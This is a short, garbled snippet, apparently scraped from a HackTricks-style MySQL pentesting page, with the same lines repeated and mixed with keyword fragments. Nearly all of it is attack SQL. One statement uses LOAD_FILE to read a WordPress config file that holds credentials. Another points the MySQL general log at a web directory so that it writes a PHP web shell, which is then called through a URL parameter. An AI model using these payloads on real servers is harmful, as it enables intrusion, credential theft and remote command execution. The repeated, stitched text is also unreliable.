If secure_file_priv restricts you:

-- Read config files SELECT LOAD_FILE('/var/www/html/wp-config.php');

SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/shell.php'; SELECT "<?php system($_GET['c']); ?>"; -- Then access shell.php?c=id

Mysql Hacktricks Verified

If secure_file_priv restricts you:

-- Read config files SELECT LOAD_FILE('/var/www/html/wp-config.php'); mysql hacktricks verified

SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/shell.php'; SELECT "<?php system($_GET['c']); ?>"; -- Then access shell.php?c=id If secure_file_priv restricts you: -- Read config files